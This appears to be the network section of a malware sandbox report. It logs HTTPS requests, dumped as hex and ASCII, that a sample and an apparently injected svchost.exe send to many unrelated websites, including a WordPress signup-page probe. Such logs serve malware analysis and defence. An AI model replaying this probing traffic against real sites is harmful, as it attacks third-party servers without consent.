                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7076INData Raw: 65 6c 3d 22 7a 61 6f 62 73 65 72 77 6f 77 61 6c 65 73 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 33 39 36 32 2e 6a 70 67 3f 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 7a 61 6f 62 73 65 72 77 6f 77 61 6c 65 73 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 0d 0a 31 30 30 30 0d 0a 69 74 65 6d 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 33 30 30 70 78 3b 20 68 65 69 67 68 74 3a 37 34 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 31 30 34 2c 47 6c 75 63 68 6f 6e 69 65 6d 69 2e 68 74 6d 6c
                                                                                                                                                                                                                                                                          Data Ascii: el="zaobserwowales"><img src="/dokumenty/batony/3962.jpg?v=1657112618" alt="zaobserwowales" aria-hidden="true" /></a></div><div class="1000item" style="width:300px; height:74px;margin-bottom:10px"><a href="/w20/batony/4104,Gluchoniemi.html
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7092INData Raw: 72 c4 99 20 73 74 72 6f 6e 79 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 20 20 09 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2e 2d 2d 3e 20 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 3c 21 2d 2d 20 30 2e 30 34 39 31 36 37 20 2f 20 57 65 62 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 28 30 35 2e 30 37 2e 32 30 32 33 20 30 38 3a 30 39 29 20 2f 2f 2d 2d 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: r strony</span></a></div> ... GoToTop .--> </body></html>... 0.049167 / WebAdministrator (05.07.2023 08:09) //-->0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          83192.168.2.6722783.223.113.46443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6816OUTGET /wp-signup.php?new=magicomm.co.uk HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: dataform.co.uk
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8553INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Cache-Control: must-revalidate, no-cache, max-age=0
                                                                                                                                                                                                                                                                          Keep-Alive: timeout=2, max=90
                                                                                                                                                                                                                                                                          Content-Length: 49049
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: mobileappversionnumber, x-requested-with
                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                          X-Powered-By: PHP/7.0.29
                                                                                                                                                                                                                                                                          X-UA-Compatible: IE=EmulateIE10
                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                          X-Mod-Pagespeed: 1.9.32.14-0
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=10886400
                                                                                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:49 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8553INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 20 20 20 20 3c
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html>...[if !(IE 6) | !(IE 7) | !(IE 8) ]>...><html lang="en-US" class="no-js">...<![endif]--><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> <
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8556INData Raw: 32 33 2c 38 32 30 33 2c 35 36 31 32 38 2c 35 36 34 34 37 5d 29 3b 63 61 73 65 22 65 6d 6f 6a 69 22 3a 72 65 74 75 72 6e 21 73 28 5b 35 35 33 35 38 2c 35 36 37 36 30 2c 39 37 39 32 2c 36 35 30 33 39 5d 2c 5b 35 35 33 35 38 2c 35 36 37 36 30 2c 38 32 30 33 2c 39 37 39 32 2c 36 35 30 33 39 5d 29 7d 72 65 74 75 72 6e 21 31 7d 28 6f 5b 72 5d 29 2c 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 74 2e 73 75 70 70 6f 72 74 73 5b 6f 5b 72 5d 5d 2c 22 66 6c 61 67 22 21 3d 3d 6f 5b 72 5d 26 26 28 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61
                                                                                                                                                                                                                                                                          Data Ascii: 23,8203,56128,56447]);case"emoji":return!s([55358,56760,9792,65039],[55358,56760,8203,9792,65039])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFla
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8948INData Raw: 48 34 20 56 31 32 7a 27 20 64 75 72 3d 27 31 2e 32 73 27 20 72 65 70 65 61 74 43 6f 75 6e 74 3d 27 69 6e 64 65 66 69 6e 69 74 65 27 20 62 65 67 69 6e 3d 27 30 27 20 6b 65 79 74 69 6d 65 73 3d 27 30 3b 2e 32 3b 2e 35 3b 31 27 20 6b 65 79 53 70 6c 69 6e 65 73 3d 27 30 2e 32 20 30 2e 32 20 30 2e 34 20 30 2e 38 3b 30 2e 32 20 30 2e 36 20 30 2e 34 20 30 2e 38 3b 30 2e 32 20 30 2e 38 20 30 2e 34 20 30 2e 38 27 20 63 61 6c 63 4d 6f 64 65 3d 27 73 70 6c 69 6e 65 27 20 20 2f 25 33 45 20 20 20 25 33 43 2f 70 61 74 68 25 33 45 20 20 20 25 33 43 70 61 74 68 20 74 72 61 6e 73 66 6f 72 6d 3d 27 74 72 61 6e 73 6c 61 74 65 28 38 29 27 20 64 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 25 33 45 20 20 20 20 20 25 33 43 61 6e 69 6d 61 74 65 20 61 74 74 72 69
                                                                                                                                                                                                                                                                          Data Ascii: H4 V12z' dur='1.2s' repeatCount='indefinite' begin='0' keytimes='0;.2;.5;1' keySplines='0.2 0.2 0.4 0.8;0.2 0.6 0.4 0.8;0.2 0.8 0.4 0.8' calcMode='spline' /%3E %3C/path%3E %3Cpath transform='translate(8)' d='M0 12 V20 H4 V12z'%3E %3Canimate attri
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8956INData Raw: 68 20 6f 70 74 69 6f 6e 73 22 2c 22 73 75 62 6d 69 74 5f 74 69 63 6b 65 74 22 3a 22 53 75 62 6d 69 74 20 54 69 63 6b 65 74 22 2c 22 73 75 62 6d 69 74 5f 74 69 63 6b 65 74 5f 6c 6f 61 64 69 6e 67 22 3a 22 50 6c 65 61 73 65 20 57 61 69 74 2e 2e 2e 22 2c 22 74 79 70 65 5f 74 6f 5f 73 65 61 72 63 68 22 3a 22 54 79 70 65 20 74 6f 20 73 65 61 72 63 68 22 7d 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 6b 62 2d 73 75 70 70 6f 72 74 2f 61 73 73 65 74 73 2f 6a 73 2f 6b 62 73 2d 61 6a 61 78 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 31
                                                                                                                                                                                                                                                                          Data Ascii: h options","submit_ticket":"Submit Ticket","submit_ticket_loading":"Please Wait...","type_to_search":"Type to search"};//...</script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/kb-support/assets/js/kbs-ajax.min.js?ver=1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8964INData Raw: 69 64 65 72 20 50 6c 75 67 69 6e 20 66 6f 72 20 57 6f 72 64 50 72 65 73 73 20 77 69 74 68 20 63 6f 6d 66 6f 72 74 61 62 6c 65 20 64 72 61 67 20 61 6e 64 20 64 72 6f 70 20 69 6e 74 65 72 66 61 63 65 2e 22 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 66 75 6e 63 74 69 6f 6e 28 65 76 65 6e 74 29 7b 76 61 72 20 6c 6f 61 64 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6c 6f 61 64 22 29 3b 76 61 72 20 72 65 6d 6f 76 65 4c 6f 61 64 69 6e 67 3d 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 6f 61 64 2e 63 6c 61 73 73 4e
                                                                                                                                                                                                                                                                          Data Ascii: ider Plugin for WordPress with comfortable drag and drop interface."/><script type="text/javascript">document.addEventListener("DOMContentLoaded",function(event){var load=document.getElementById("load");var removeLoading=setTimeout(function(){load.classN
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8972INData Raw: 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 68 6f 6d 65 20 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 69 74 65 6d 20 70 61 67 65 5f 69 74 65 6d 20 70 61 67 65 2d 69 74 65 6d 2d 31 36 20 63 75 72 72 65 6e 74 5f 70 61 67 65 5f 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 35 34 30 35 38 20 61 63 74 20 66 69 72 73 74 22 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 27 20 64 61 74 61 2d 6c 65 76 65 6c 3d 27 31 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 74 65 78 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 74 65 78 74 22 3e 48 6f
                                                                                                                                                                                                                                                                          Data Ascii: em menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-16 current_page_item menu-item-54058 act first"><a href='https://dataform.co.uk/' data-level='1'><span class="menu-item-text"><span class="menu-text">Ho
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8980INData Raw: 7d 0a 76 61 72 20 74 69 6d 65 72 49 44 3d 6e 75 6c 6c 3b 76 61 72 20 74 69 6d 65 72 52 75 6e 6e 69 6e 67 3d 66 61 6c 73 65 3b 76 61 72 20 78 3d 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 6e 6f 77 3d 78 2e 67 65 74 54 69 6d 65 28 29 3b 76 61 72 20 67 6d 74 3d 31 36 38 38 35 33 37 32 36 39 2a 31 30 30 30 3b 76 61 72 20 64 69 66 66 6d 73 3d 28 6e 6f 77 2d 67 6d 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 63 3d 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 6c 61 73 73 4e 61 6d 65 3b 63 3d 63 2e 72 65 70 6c 61 63 65 28 2f 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6e 6f 2d 6a 73 2f 2c 27 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 27 29 3b 64 6f 63 75 6d
                                                                                                                                                                                                                                                                          Data Ascii: }var timerID=null;var timerRunning=false;var x=new Date();var now=x.getTime();var gmt=1688537269*1000;var diffms=(now-gmt);</script><script type="text/javascript">var c=document.body.className;c=c.replace(/woocommerce-no-js/,'woocommerce-js');docum


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          84192.168.2.6698475.2.95.235443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6881OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: ldh.la.gov
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7058INHTTP/1.1 406 Not Acceptable
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:49 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Content-Length: 1346
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7058INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 36 20 2d 20 43 6c 69
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>406 - Cli


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          85192.168.2.67363185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7076OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: techtrans.de
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7103INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:49 GMT
                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                          Expires: 0
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7103INData Raw: 32 63 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                                                                                                                          Data Ascii: 2c2<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          86192.168.2.67425188.114.96.7443C:\Users\user\Desktop\nhVJ8J5qOt.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7120OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: hyab.se
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7494INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:49 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Location: https://hyab.com
                                                                                                                                                                                                                                                                          Cache-Control: max-age=600
                                                                                                                                                                                                                                                                          Expires: Wed, 05 Jul 2023 06:17:49 GMT
                                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RZABw4YS7W241QutIZbgwKbc49uWrBmRaXnvpama8QDs5VnxOmIKQM9PqpWwpgDrkTipUYQ1fVP09s%2BGxv05L9rxut8nrurpn%2F70ar%2BaOJkAX9LiwwK6l8EH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 7e1d6e0d3ddb9a1d-FRA
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7494INData Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7495INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          87192.168.2.67432172.67.164.178443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7142OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: clinicasanluis.com.co
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7863INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:49 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          Set-Cookie: d55e479f054c94814cbc10d217aaa990=2c1217cd4ef10ccd5a210ebe57581cb0; path=/; HttpOnly
                                                                                                                                                                                                                                                                          Last-Modified: Wed, 05 Jul 2023 06:07:49 GMT
                                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7XM7I6eBUfICkhfXZHxj3XnvumnuXWOhSf%2B7SJ8idEANNzQ4jSKdNGV7S0d3wYcYNyHvy0439iJw0cnw8%2Bqb53VuQGrfM0rvSCwiW0Tw3OLUR5LWviFcq0GmfoM8vFzeNsvDqIfvmCU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 7e1d6e0d487c2bf2-FRA
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7864INData Raw: 37 63 35 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 22 20
                                                                                                                                                                                                                                                                          Data Ascii: 7c52<!DOCTYPE html><html lang="es-ES" dir="ltr"><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><base href="https://clinicasanluis.com.co/"
